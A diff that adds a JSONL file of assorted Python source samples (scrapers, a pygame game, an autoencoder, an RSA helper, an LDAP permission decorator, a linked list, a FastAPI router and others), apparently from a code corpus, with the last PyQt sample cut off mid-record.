diff --git "a/6244.jsonl" "b/6244.jsonl" new file mode 100644--- /dev/null +++ "b/6244.jsonl" @@ -0,0 +1,661 @@ +{"seq_id":"219957056","text":"from bs4 import BeautifulSoup\nimport ctypes\nimport urllib.request\nimport urllib\n\nimport sys\n\nfrom collections import Counter\nimport random\nimport webbrowser\nfrom konlpy.tag import Hannanum\nfrom lxml import html\nimport pytagcloud\nimport sys\n\n\nif sys.version_info[0] >= 3:\n urlopen = urllib.request.urlopen\nelse:\n urlopen = urllib.urlopen\n\nr = lambda: random.randint(0,255)\ncolor = lambda: (r(),r(),r())\n\n\ndef get_tag(text, ntags=50, multiplier=10):\n h = Hannanum()\n nouns = h.nouns(text)\n count = Counter(nouns)\n return [{ 'color' : color(), 'tag' : n, 'size': c*multiplier} for n,c in count.most_common(ntags)]\n\n\ndef draw_cloud(tags, filename, fontname='Noto Sans CJK', size=(800,600)):\n pytagcloud.create_tag_image(tags, filename, fontname=fontname, size=size)\n webbrowser.open(filename)\n\nindex = 0\nmy_list = []\ns = \"\"\ninit_number = 63844\nwhile True:\n\tif index == 20:\n\t\tbreak\n\tno = init_number+index\n\tpage_url = 'http://www.thisisgame.com/webzine/game/nboard/16/?n='+str(no)\n\turl_open = urllib.request.urlopen(page_url)\n\tsoup = BeautifulSoup(url_open, 'html.parser', from_encoding = 'utf-8')\n\tp_list = soup.select('.content-line span')\n\n\tfor i in range(0, len(p_list)):\n \t\tmy_list.append(p_list[i].text)\n\tindex = index+1\nfor i in range(0, len(my_list)):\n s += my_list[i]\ntags = get_tag(s)\nprint(tags)\ndraw_cloud(tags, 'thisisgame.png') \n","sub_path":"crawling/thisisgmae.py","file_name":"thisisgmae.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"140541967","text":"import random\n\nimport pygame\n\nfrom menu.Item import Item\nfrom menu.Menu import Menu\nfrom playobjects.Block import Block\nfrom playobjects.Player import Player\n\nwindow = pygame.display.set_mode((800, 400))\npygame.display.set_caption(\"RUN!\")\nicon = pygame.image.load(\"img/block.png\")\npygame.display.set_icon(icon)\n\nscreen = pygame.Surface((800, 400))\n\nx = 0\ny = 0\nsquare_go_right = True\nsquare_go_down = True\n\nw, h = pygame.display.get_surface().get_size()\n\nmenu = Menu(w, h, [])\nmenu.menu(window)\n\nplayer = Player(0, 360)\nblock = Block(800, 360)\npygame.font.init()\nfont = pygame.font.Font(\"fonts/Mono.ttf\", 32)\n\ndone = True\npygame.key.set_repeat(1, 1)\ntime_delay = pygame.time.Clock()\ndt = 0\n\nwhile done:\n for e in pygame.event.get():\n if e.type == pygame.QUIT:\n done = False\n if e.type == pygame.KEYDOWN:\n if e.key == pygame.K_SPACE:\n player.jump()\n screen.fill((255, 255, 255))\n\n # render\n player.render(screen)\n f = font.render(\"points %d\" % player.points, 1, (0, 0, 0))\n screen.blit(f, (0, 0))\n if block is not None:\n block.render(screen)\n window.blit(screen, (0, 0))\n\n # Relation logic\n if block.visible:\n if player.check_collision(block):\n menu = Menu(w, h, [Item(\"Points = %d\" % player.points, w, h / 2)])\n menu.menu(window)\n block = Block(800, 360)\n player = Player(0, 360)\n if block.x < player.x and player.y + player.h > block.y:\n player.y = min(360, block.y)\n\n player.move(dt)\n\n # Block logic\n\n if block.visible:\n block.move()\n if block.x < -50:\n block.y = 400\n block.visible = False\n block.real_speed = 0\n player.points += 1\n if player.points % 5 == 0:\n block.increase_speed()\n\n if not block.visible:\n if random.randint(0, 1000) > 990:\n block.reset()\n\n pygame.display.flip()\n dt = time_delay.tick(200)\n","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":1989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"631054728","text":"import cv2\nimport numpy as np\nimport random\nimport matplotlib.pyplot as plt\nimport os\nfrom tqdm import tqdm\nfrom initializers import *\nfrom auto_encoder import Autoencoder\nimport pandas as pd\n\nrandom.seed(1447)\nnp.random.seed(1447)\n\n\ndef random_input(path, size=256):\n image_paths = [os.path.join(path, img_path) for img_path in os.listdir(path)]\n # img_path = image_paths[0] # beee :)\n img_path = random.choice(image_paths)\n print(\"Loading image: {}\".format(img_path))\n img = cv2.imread(img_path, 0)\n img = cv2.resize(img, (size, size))\n img = 2 * img / 255 - 1\n img = limit_values(img)\n return img.copy()\n\n\ndef loss_sqe(x, y):\n return (x - y) ** 2\n\n\nDATA_TRAIN_DIR = './data/train/'\nDATA_TRAIN_DIR = './data/test/'\nDATA_TEST_DIR = './data/test/'\nRESULTS_DIR = './results/'\n\nMOMENTUM = 0.95\nTRAIN_ITERS = 1000\n\n# 1e-4 for bee lr\n\n\ndef train(min_error=1000., max_iter_count=1000, data_dir=DATA_TRAIN_DIR, learn_rate=0.0001, print_w=False,\n use_norm=True, loss=loss_sqe, mid_layers=64, use_adapt_lr=True):\n global TRAIN_ITERS\n model = Autoencoder(use_norm=use_norm, initializer=glorot_uniform, loss=loss, mid_layers=mid_layers, lr=learn_rate,\n use_adapt_lr=use_adapt_lr)\n train_sample = random_input(data_dir)\n errors = []\n best_errors = []\n moving_average = None\n best_error = np.inf\n best_weights = None\n is_good = False\n try:\n for _ in tqdm(range(max_iter_count)):\n if is_good:\n continue\n error = model(train_sample)\n moving_average = MOMENTUM * moving_average + error * (1. - MOMENTUM) if moving_average else error\n errors.append(moving_average)\n if best_errors:\n best_errors.append([_, min(moving_average, best_errors[-1][1])])\n else:\n best_errors.append([_, moving_average])\n if moving_average < best_error:\n print(moving_average)\n best_error = moving_average\n best_weights = model.get_weights()\n\n if best_error < min_error and not is_good:\n TRAIN_ITERS = _\n is_good = True\n except RuntimeError as e:\n print(e)\n finally:\n print(\"Number of iteration to get e={}: {}\".format(min_error, TRAIN_ITERS))\n x = np.arange(len(errors))\n plt.plot(x, np.array(errors))\n idx = np.argmin(errors)\n print(\"BEST ERROR {}\".format(errors[idx]))\n plt.plot(x[idx], errors[idx], 'rx--', linewidth=2, markersize=12)\n plt.xlabel('Iteration')\n plt.ylabel('Current Error')\n plt.savefig('error_{}.png'.format(mid_layers))\n plt.show()\n model.set_phase('test')\n model.set_weights(best_weights)\n if print_w:\n print(best_weights)\n print(best_errors)\n s_e = sorted(best_errors, key=lambda x: x[1])\n x = [_[1] for _ in s_e]\n y = [_[0] for _ in s_e]\n plt.plot(x, y, 'ro--', linewidth=0.5, markersize=3)\n plt.xlabel('Error')\n plt.ylabel('Min Iterations')\n plt.savefig('error_deps.png')\n plt.show()\n print(s_e)\n\n return model\n\n\nif __name__ == \"__main__\":\n\n model = train(mid_layers=64, learn_rate=0.0001, min_error=1000.0)\n flower_path = os.path.join(DATA_TEST_DIR, '1.jpg')\n img, res = model.predict(flower_path)\n fig, ax = plt.subplots(1, 2)\n ax[0].imshow(img, cmap='gray')\n ax[0].set_xlabel('original')\n ax[1].imshow(res, cmap='gray')\n ax[1].set_xlabel('modified')\n plt.savefig('32.png')\n plt.show()\n","sub_path":"IAI/autoencoder/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"259021157","text":"#!/usr/bin/env python3\n\nimport rsa\n'''\n refer to https://github.com/zhanghe06/python/blob/master/tools/rsa_encrypt.py\n'''\nclass MRsa(object):\n def __init__(self,pubfile,prifile):\n self.pubf=pubfile\n self.prif=prifile\n\n def CreateKeys(self):\n (_pub,_pri)=rsa.newkeys(1024)\n\n pub=_pub.save_pkcs1()\n with open(self.pubf,'w+') as pub_file:\n pub_file.write(pub)\n\n pri=_pri.save_pkcs1()\n with open(self.prif,'w+') as pri_file:\n pri_file.write(pri)\n\n def GetPri(self):\n with open(self.prif) as pri_file:\n p=pri_file.read()\n pri_key=rsa.PrivateKey.load_pkcs1(p)\n return pri_key\n\n def GetPub(self):\n with open(self.pubf) as pub_file:\n p=pub_file.read()\n pub_key=rsa.PublicKey.load_pkcs1(p)\n return pub_key\n\n def Encrypt(self,plaintext):\n pub_key=self.GetPub()\n ciphertext=rsa.encrypt(plaintext,pub_key)\n return ciphertext\n\n def Decrypt(self,ciphertext):\n pri_key=self.GetPri()\n plaintext=rsa.decrypt(ciphertext,pri_key)\n return plaintext\n\n def Signature(self,message):\n pri_key=self.GetPri()\n sign=rsa.sign(message,pri_key,'SHA-256')\n return sign\n\n def VerifySign(self,plaintext,ciphertext):\n pub_key=self.GetPub()\n try:\n rsa.verify(plaintext,ciphertext,pub_key)\n return True\n except:\n return False\n\n\n\nif __name__=='__main__':\n m=MRsa('./pub.pem','./pri.pem')\n# m.CreateKeys()\n print(m.Decrypt(m.Encrypt('helloworld')))\n\n","sub_path":"python/rsahandler.py","file_name":"rsahandler.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"79618480","text":"# -*- coding: utf-8 -*-\n\"\"\"\n This spider is a AsusJobs spider created on top of the ATSSpider\n scrapy crawl asusjobs -a mining_job_id=9999 -a iteration=1 -a extract=1 -a url=\"https://hr-recruit.asus.com/\"\n\n sample job url:\n https://hr-recruit.asus.com/showPositionDesc.aspx?fb=1837\n\"\"\"\n\nfrom re import compile\nfrom scrapy.http import Request\nfrom scrapy.http import FormRequest\nfrom scrapy.selector import Selector\nfrom urlparse import urljoin\n\nfrom brightcorp.base.atsspiders import ATSSpider\nfrom brightcorp.items import BrightcorpItemLoader\nfrom brightcorp.processors import Prefix\n\n\nclass AsusJobs(ATSSpider):\n\n name = \"asusjobs\"\n Job_Url = compile(r\"\\('(\\S+)','.*\\)\")\n\n def parse(self, response):\n sel = Selector(response)\n redirect_url = sel.xpath('//frame/@src').extract()\n if redirect_url:\n yield Request(\n callback=self.parse_redirect_page,\n url=urljoin(response.url, redirect_url[0])\n )\n\n def parse_redirect_page(self, response):\n sel = Selector(response)\n event_target = sel.xpath('//select[@name=\"dropSelZLD00\"]/@id').extract()\n categories = sel.xpath('//select[@name=\"dropSelZLD00\"]/option/@value').extract()\n for category in categories:\n yield FormRequest.from_response(\n callback=self.parse_job_list,\n formname='form1',\n formdata={\n '__EVENTTARGET': ''.join(event_target),\n 'dropSelZLD00': category,\n },\n response=response\n )\n\n def parse_job_list(self, response):\n sel = Selector(response)\n jobs = sel.xpath('//table[@id=\"itemTable\"]//tr/td/label/@onclick').extract()\n for job in jobs:\n url = self.Job_Url.search(job)\n if url:\n yield Request(\n callback=self.parse_job_callback(),\n url=urljoin(response.url, '/%s' % url.group(1))\n )\n\n def parse_job(self, response):\n loader = BrightcorpItemLoader(response=response)\n\n loader.add_xpath(\n 'description',\n '//td[contains(text(), \"%s\")]/../following-sibling::tr[@class=\"cart_oii\"][1]' % unicode('職位說明', 'utf-8')\n )\n loader.add_xpath(\n 'jobcategory',\n '//td[contains(text(), \"%s\")]/../following-sibling::tr[@class=\"cart_oii\"][1]/td/text()' % unicode('需求部門/單位', 'utf-8')\n )\n loader.add_xpath(\n 'location',\n '//td[contains(text(), \"%s\")]/../following-sibling::tr[@class=\"cart_oii\"][1]/td/text()' % unicode('工作地點', 'utf-8')\n )\n loader.add_xpath(\n 'referencenumber',\n '//td[contains(text(), \"%s\")]/../following-sibling::tr[@class=\"cart_oii\"][1]/td/text()' % unicode('職位代號', 'utf-8'),\n Prefix('%s-' % self.name)\n )\n loader.add_xpath(\n 'title',\n '//td[contains(text(), \"%s\")]/../following-sibling::tr[@class=\"cart_oii\"][1]/td/text()' % unicode('職位名稱', 'utf-8')\n )\n loader.add_xpath(\n 'other',\n '//td[contains(text(), \"%s\")]/../following-sibling::tr[@class=\"cart_oii\"][1]/td/text()' % unicode('其他工作條件', 'utf-8')\n )\n\n loader.add_value('apply_url', response.url)\n loader.add_value('url', response.url)\n\n yield loader.load_item()\n","sub_path":"brightcorp/brightcorp/spiders/asusjobs.py","file_name":"asusjobs.py","file_ext":"py","file_size_in_byte":3471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"106179007","text":"import cv2\nimport numpy as np\n\ndef nothing(x):\n pass\n\nimage_x, image_y = 64,64\n\nfrom keras.models import load_model\nclassifier = load_model('Trained_model.h5')\n\ndef predictor():\n import numpy as np\n from keras.preprocessing import image\n test_image = image.load_img('1.png', target_size=(64, 64))\n test_image = image.img_to_array(test_image)\n test_image = np.expand_dims(test_image, axis = 0)\n result = classifier.predict(test_image)\n \n if result[0][0] == 1:\n return 'Book'\n elif result[0][1] == 1:\n return 'Clock'\n elif result[0][2] == 1:\n return 'Fork'\n elif result[0][3] == 1:\n return 'Friend'\n elif result[0][4] == 1:\n return 'Lamp'\n elif result[0][5] == 1:\n return 'Marriage'\n elif result[0][6] == 1:\n return 'Shoes'\n elif result[0][7] == 1:\n return 'Stop'\n elif result[0][8] == 1:\n return 'Toilet'\n elif result[0][9] == 1:\n return 'with'\n\n\ncam = cv2.VideoCapture(0)\n\ncv2.namedWindow(\"Trackbars\")\n\ncv2.createTrackbar(\"L - H\", \"Trackbars\", 0, 179, nothing)\ncv2.createTrackbar(\"L - S\", \"Trackbars\", 0, 255, nothing)\ncv2.createTrackbar(\"L - V\", \"Trackbars\", 0, 255, nothing)\ncv2.createTrackbar(\"U - H\", \"Trackbars\", 179, 179, nothing)\ncv2.createTrackbar(\"U - S\", \"Trackbars\", 255, 255, nothing)\ncv2.createTrackbar(\"U - V\", \"Trackbars\", 255, 255, nothing)\n\ncv2.namedWindow(\"test\")\n\nimg_counter = 0\n\nimg_text = ''\nwhile True:\n ret, frame = cam.read()\n frame = cv2.flip(frame,1)\n l_h = cv2.getTrackbarPos(\"L - H\", \"Trackbars\")\n l_s = cv2.getTrackbarPos(\"L - S\", \"Trackbars\")\n l_v = cv2.getTrackbarPos(\"L - V\", \"Trackbars\")\n u_h = cv2.getTrackbarPos(\"U - H\", \"Trackbars\")\n u_s = cv2.getTrackbarPos(\"U - S\", \"Trackbars\")\n u_v = cv2.getTrackbarPos(\"U - V\", \"Trackbars\")\n\n\n img = cv2.rectangle(frame, (425,100),(625,300), (0,255,0), thickness=2, lineType=8, shift=0)\n\n lower_blue = np.array([l_h, l_s, l_v])\n upper_blue = np.array([u_h, u_s, u_v])\n imcrop = img[102:298, 427:623]\n hsv = cv2.cvtColor(imcrop, cv2.COLOR_BGR2HSV)\n mask = cv2.inRange(hsv, lower_blue, upper_blue)\n \n cv2.putText(frame, img_text, (30, 400), cv2.FONT_HERSHEY_TRIPLEX, 1.5, (0, 255, 0))\n cv2.imshow(\"test\", frame)\n cv2.imshow(\"mask\", mask)\n \n #if cv2.waitKey(1) == ord('c'):\n \n img_name = \"1.png\"\n save_img = cv2.resize(mask, (image_x, image_y))\n cv2.imwrite(img_name, save_img)\n print(\"{} written!\".format(img_name))\n img_text = predictor()\n \n\n if cv2.waitKey(1) == 27:\n break\n\n\ncam.release()\ncv2.destroyAllWindows()","sub_path":"recognise.py","file_name":"recognise.py","file_ext":"py","file_size_in_byte":2722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"478780663","text":"import sys\nsys.path.append('../')\n\nimport argparse\nimport mediascrapers\nfrom mediascrapers import TwitterImageScraper\n\nif __name__ == \"__main__\":\n ap = argparse.ArgumentParser()\n ap.add_argument(\"--url-list\", required=True,\n help=\"Path of file\")\n args = vars(ap.parse_args())\n filepath = args[\"url_list\"]\n\n scraper = TwitterImageScraper(driver='chrome', mode='verbose', debug=True)\n file = open(filepath, 'r')\n URLs = file.readlines()\n\n for url in URLs:\n print(url)\n tasks = scraper.scrape(url)\n scraper.download(tasks=tasks, path='.\\\\download\\\\general')\n","sub_path":"mediascraper/twitterimagescraper.py","file_name":"twitterimagescraper.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"24999974","text":"import ldap\n\nfrom functools import wraps\n\nfrom flask import redirect, url_for, abort, request, current_app\n\n\ndef check_ldap(remote_user):\n try:\n l = ldap.initialize(current_app.config[\"LDAPS_URL\"])\n l.set_option(ldap.OPT_X_TLS, 1)\n l.bind_s(\n current_app.config[\"LDAP_DN\"],\n current_app.config[\"LDAP_PW\"])\n admin = l.search_s(\n current_app.config[\"LDAP_ADMIN_FQDN\"],\n ldap.SCOPE_SUBTREE,\n \"(userPrincipalName={})\".format(remote_user),\n [\"memberOf\"])\n if admin and \"memberOf\" in admin[0][1]:\n results = admin[0][1][\"memberOf\"]\n return results\n\n staff = l.search_s(\n current_app.config[\"LDAP_STAFF_FQDN\"],\n ldap.SCOPE_SUBTREE,\n \"(userPrincipalName={})\".format(remote_user),\n [\"memberOf\"])\n if staff and \"memberOf\" in staff[0][1]:\n results = staff[0][1][\"memberOf\"]\n return results\n except:\n return []\n return []\n\n\ndef permissions(needed, return_to=False):\n def check_permissions(function):\n @wraps(function)\n def wrapper(*args, **kwargs):\n my_perms = check_ldap(request.environ[\"REMOTE_USER\"])\n if set(needed).intersection(set(my_perms)):\n return function(*args, **kwargs)\n if current_app.config[\"LDAP_ADMIN_FQDN\"] in my_perms:\n return function(*args, **kwargs)\n if return_to:\n return redirect(url_for(return_to))\n return abort(401)\n return wrapper\n return check_permissions\n","sub_path":"app/security.py","file_name":"security.py","file_ext":"py","file_size_in_byte":1619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"196380527","text":"from math import log\nfrom math import pow\nfrom math import sqrt\n\nimport sys\n\ndef nsqrt(x, n):\n\treturn x**(1/float(n))\n\n\ndef d(a0, e):\n\tcnt = 0\n\teroot = nsqrt(a0, e)\n\twhile eroot == int(eroot):\n\t\tcnt+=1\n\t\teroot = nsqrt(eroot, e)\n\treturn cnt\n\n\ndef subd(a0, e, N):\n\tk = d(a0, e)\n\tcandidat = int(nsqrt(a0, e))\n\twhile pow(a0, e)+candidat > N and k >= 0:\n\t\tcandidat = int(nsqrt(candidat, e))\n\t\tk -= 1\n\t\n\treturn k\n\ndef main(argv):\n\tN = int(argv[0])\n\tresultat = 0\n\temax = int(log(N)/log(2))\n\tprint (\"emax = \", emax)\n\tfor e in range(2, emax+1):\n\t\ta0 = 2\n\t\twhile pow(a0, e)+a0 <= N:\n\t\t\tk = d(a0, e)+1\n\t\t\tresultat += k*k\n\t\t\ta0+=1\n\t\tif d(a0, e) > 0: # Border case where the condition a0^e+a0 <= N might not hold anymore.\n\t\t\tprint (a0, e)\n\t\t\tl = subd(a0, e, N) # If a0 = x^(e*k), we find the highest l s.t. a0^e+x^(e*l) <= N.\n\t\t\tif l >= 0:\n\t\t\t\tresultat += (l+1)**2\n\n\tprint (resultat)\n\nif __name__ == \"__main__\":\n\tmain(sys.argv[1:])\n","sub_path":"src/pb617.py","file_name":"pb617.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"620301227","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Jun 11 15:02:09 2018\r\n\r\n@author: Balasubramaniam\r\n\"\"\"\r\n\r\nfrom openpyxl import load_workbook\r\nfilePath=\"F:/citi_ml_jun2018/day1/GDP.xlsx\"\r\nwb=load_workbook(filePath,read_only=True,data_only=True)\r\nsheetRef=wb.get_sheet_by_name(\"GDP\")\r\nfor row in range(6,70):\r\n print(sheetRef.cell(column=1,row=row).value,end=\"\\t\")\r\n\r\n","sub_path":"ExcelFileReading.py","file_name":"ExcelFileReading.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"286539549","text":"class Node:\r\n def __init__(self, val):\r\n self.data = val\r\n self.next = None\r\n self.previous = None\r\n\r\n\r\nclass DLinkedList:\r\n \"\"\"\r\n DLinkedList class contains the main methods of a doubly linked list\r\n \"\"\"\r\n def __init__(self):\r\n self.head = None\r\n self.tail = None\r\n self.size = 0\r\n\r\n def get_head(self):\r\n \"\"\"\r\n get the value of the first node\r\n \"\"\"\r\n # Time complexity: O(1)\r\n # Space complexity: O(1)\r\n if self.head is None:\r\n return None\r\n return self.head.data\r\n\r\n def get_tail(self):\r\n \"\"\"\r\n get the value of the last node\r\n \"\"\"\r\n # Time complexity: O(1)\r\n # Space complexity: O(1)\r\n if self.tail is None:\r\n return None\r\n return self.tail.data\r\n\r\n def get_size(self):\r\n return self.size\r\n\r\n def prepend(self, val):\r\n \"\"\"\r\n add a leading node at the beginning of the linked list giving its value\r\n \"\"\"\r\n # Time complexity: O(1)\r\n # Space complexity: O(1)\r\n newNode = Node(val)\r\n newNode.next = self.head\r\n newNode.previous = None\r\n if self.tail is None:\r\n self.tail = newNode\r\n if self.head:\r\n self.head.previous = newNode\r\n self.head = newNode\r\n self.size += 1\r\n\r\n def pop_first(self):\r\n \"\"\"\r\n delete the leading node of the linked list\r\n \"\"\"\r\n # Time complexity: O(1)\r\n # Space complexity: O(1)\r\n if self.head is None:\r\n raise IndexError\r\n else:\r\n del_val = self.head.data\r\n self.head = self.head.next\r\n if self.head:\r\n self.head.previous = None\r\n self.size -= 1\r\n if self.size == 0:\r\n self.tail = None\r\n return del_val\r\n\r\n def append(self, val):\r\n \"\"\"\r\n add a node at the end of the linked list giving its value\r\n \"\"\"\r\n # Time complexity: O(1)\r\n # Space complexity: O(1)\r\n new_node = Node(val)\r\n if self.head is None:\r\n self.tail = new_node\r\n self.head = new_node\r\n else:\r\n old_tail = self.tail\r\n self.tail.next = new_node\r\n self.tail = new_node\r\n self.tail.previous = old_tail\r\n self.size += 1\r\n\r\n def pop_last(self):\r\n \"\"\"\r\n delete the last node of the linked list\r\n \"\"\"\r\n # Time complexity: O(1)\r\n # Space complexity: O(1)\r\n if self.head is None:\r\n raise IndexError\r\n last_node = self.tail.data\r\n self.tail = self.tail.previous\r\n if self.tail:\r\n self.tail.next = None\r\n self.size -= 1\r\n if self.size == 0:\r\n self.head = None\r\n return last_node\r\n\r\n def insert_node(self, new_node, previous_node):\r\n \"\"\"\r\n insert a giving node to the new list given the previous node to it\r\n \"\"\"\r\n # Time complexity: O(1)\r\n # Space complexity: O(1)\r\n next_node = previous_node.next \r\n new_node.next = next_node\r\n new_node.previous = previous_node\r\n if next_node:\r\n next_node.previous = new_node\r\n else:\r\n self.tail = new_node\r\n previous_node.next = new_node\r\n\r\n # return a list of all values of the nodes\r\n n = self.head\r\n out = [n.data]\r\n for _ in range(self.size):\r\n n = n.next\r\n out.append(n.data)\r\n return out\r\n\r\n def detete_node(self, node):\r\n \"\"\"\r\n delete a given node\r\n \"\"\"\r\n # Time complexity: O(1)\r\n # Space complexity: O(1)\r\n prev_node = node.previous # get the node before the node to delete\r\n next_node = node.next # get the node after the node to delete\r\n if (not prev_node) and (not next_node): # if there are nodes before and after the node (linked list size is 1)\r\n self.head = None # set the head to None\r\n self.tail = None # set the tail to None\r\n if prev_node: # if previous node found\r\n prev_node.next = next_node # set its next reference to the next node\r\n else:\r\n self.head = next_node # if not found, set head of the linked list to the next node\r\n if next_node:\r\n next_node.previous = prev_node\r\n else:\r\n self.tail = prev_node\r\n\r\n\r\n\r\n","sub_path":"implementation_5/doubly_linked_list.py","file_name":"doubly_linked_list.py","file_ext":"py","file_size_in_byte":4483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"365355437","text":"\"\"\"Add fields to Team\n\nRevision ID: d2853477b461\nRevises: a23d4d63432d\nCreate Date: 2017-01-04 17:23:20.326509\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'd2853477b461'\ndown_revision = 'a23d4d63432d'\nbranch_labels = None\ndepends_on = None\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.add_column('teams', sa.Column('created_at', sa.DateTime(timezone=True), nullable=True))\n op.add_column('teams', sa.Column('description', sa.String(), nullable=True))\n op.add_column('teams', sa.Column('owner_id', sa.Integer(), nullable=True))\n op.add_column('teams', sa.Column('updated_at', sa.DateTime(timezone=True), nullable=True))\n op.create_foreign_key(None, 'teams', 'users', ['owner_id'], ['id'])\n op.add_column('users_teams', sa.Column('created_at', sa.DateTime(timezone=True), nullable=True))\n op.add_column('users_teams', sa.Column('id', sa.Integer(), nullable=False))\n op.add_column('users_teams', sa.Column('team_ud', sa.Integer(), nullable=True))\n op.add_column('users_teams', sa.Column('updated_at', sa.DateTime(timezone=True), nullable=True))\n op.drop_constraint('users_teams_team_id_fkey', 'users_teams', type_='foreignkey')\n op.create_foreign_key(None, 'users_teams', 'teams', ['team_ud'], ['id'])\n op.drop_column('users_teams', 'team_id')\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.add_column('users_teams', sa.Column('team_id', sa.INTEGER(), autoincrement=False, nullable=True))\n op.drop_constraint(None, 'users_teams', type_='foreignkey')\n op.create_foreign_key('users_teams_team_id_fkey', 'users_teams', 'teams', ['team_id'], ['id'])\n op.drop_column('users_teams', 'updated_at')\n op.drop_column('users_teams', 'team_ud')\n op.drop_column('users_teams', 'id')\n op.drop_column('users_teams', 'created_at')\n op.drop_constraint(None, 'teams', type_='foreignkey')\n op.drop_column('teams', 'updated_at')\n op.drop_column('teams', 'owner_id')\n op.drop_column('teams', 'description')\n op.drop_column('teams', 'created_at')\n ### end Alembic commands ###\n","sub_path":"alembic/versions/d2853477b461_add_fields_to_team.py","file_name":"d2853477b461_add_fields_to_team.py","file_ext":"py","file_size_in_byte":2201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"99022","text":"from bs4 import BeautifulSoup\n\n\ndef read_file(fileName):\n file = open(fileName)\n data = file.read()\n file.close()\n return data\n\n\nsoup = BeautifulSoup(read_file('intro_to_soup_html.html'), 'lxml')\nmeta = soup.meta\nprint(meta)\nprint(meta.get('charset'))\n\nbody = soup.body\nprint(body)","sub_path":"example 5.py","file_name":"example 5.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"288455100","text":"\"\"\"\nEndpoint routers for users.\n\nEventually might need to handle auth here as well, so write code as if\nthat was an upcoming feature.\n\"\"\"\nfrom fastapi import APIRouter\nfrom models import users as models\nfrom docs import users as docs\nimport util.users as utils\n\nrouter = APIRouter()\n\n\n@router.post(\n \"/users/register\",\n response_model=models.UserRegistrationResponse,\n description=docs.registration_desc,\n summary=docs.registration_summ,\n tags=[\"Users\"],\n status_code=201,\n)\nasync def register_user(form: models.UserRegistrationForm):\n # send the form data and DB instance to util.users.register_user\n user_id = await utils.register_user(form)\n\n # return response in reponse model\n return models.UserRegistrationResponse(user_id=user_id)\n\n\n@router.delete(\n \"/users/delete\",\n description=docs.delete_user_desc,\n summary=docs.delete_user_summ,\n tags=[\"Users\"],\n status_code=204,\n)\nasync def delete_user(identifier: models.UserIdentifier):\n await utils.delete_user(identifier)\n\n\n@router.post(\"/users/find\",\n response_model=models.UserInfoQueryResponse,\n description=docs.find_user_by_identifier_desc,\n summary=docs.find_user_by_identifier_summ,\n tags=[\"Users\"],\n status_code=200)\nasync def get_user(identifier: models.UserIdentifier):\n user_data = await utils.get_user_info_by_identifier(identifier)\n return models.UserInfoQueryResponse(**user_data.dict())\n","sub_path":"routes/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":1468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"613148416","text":"#!/usr/bin/env python\n\nfrom optparse import OptionParser\nfrom gen.run_generators import RUNGeneratorRes\nimport os\nimport sys\n\ndef parse_args():\n parser = OptionParser(\"usage: %prog [options] [files...] \"\n \"[generators...] [param=val[,val]...]\")\n\n parser.add_option('-o', '--out-dir', dest='out_dir',\n help='directory for data output',\n default=(\"%s/%s\"% (os.getcwd(), \"RESEXPS\")))\n\n return parser.parse_args()\n\ndef main():\n opts, inFolders = parse_args()\n distr = 0.8\n res_number = 3\n \n if not os.path.exists(opts.out_dir):\n os.mkdir(opts.out_dir)\n if opts.out_dir[-1] != '/':\n opts.out_dir = opts.out_dir+'/'\n \n for folder in inFolders:\n done = False\n trial = 0\n while (not done and trial < 50):\n try:\n if folder[-1] == '/':\n folder = folder[:-1]\n foldername = folder.strip().split('/')[-1]\n out_dir = opts.out_dir+foldername+\"_res=\"+str(distr)+\"/\"\n if not os.path.exists(out_dir):\n os.mkdir(out_dir)\n \n \n generator = RUNGeneratorRes()\n generator.out_dir=out_dir\n\n params = {}\n\n ts = generator._create_taskset_from_file(params, res_number, folder, distr)\n\n generator._customize(ts, params)\n generator._write_schedule(dict(params.items() + [('task_set', ts)]))\n generator._write_params(params)\n done = True\n except:\n trial += 1\n continue\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"duplicateExpWithRes.py","file_name":"duplicateExpWithRes.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"313627800","text":"# https://stackoverflow.com/questions/62262538/how-to-add-an-image-in-pyqt-qdock-widget\n\nfrom PyQt5 import QtWidgets, QtGui\nfrom PyQt5.QtWidgets import (QApplication, QMainWindow)\nfrom PyQt5.QtCore import Qt\n \nimport sys\n\nclass MainWindow(QMainWindow):\n def __init__(self):\n super().__init__()\n self.resize(800, 600)\n\n dockWidget = QtWidgets.QDockWidget()\n dockWidget.setWindowTitle(\"Image Viewer\")\n \n image = 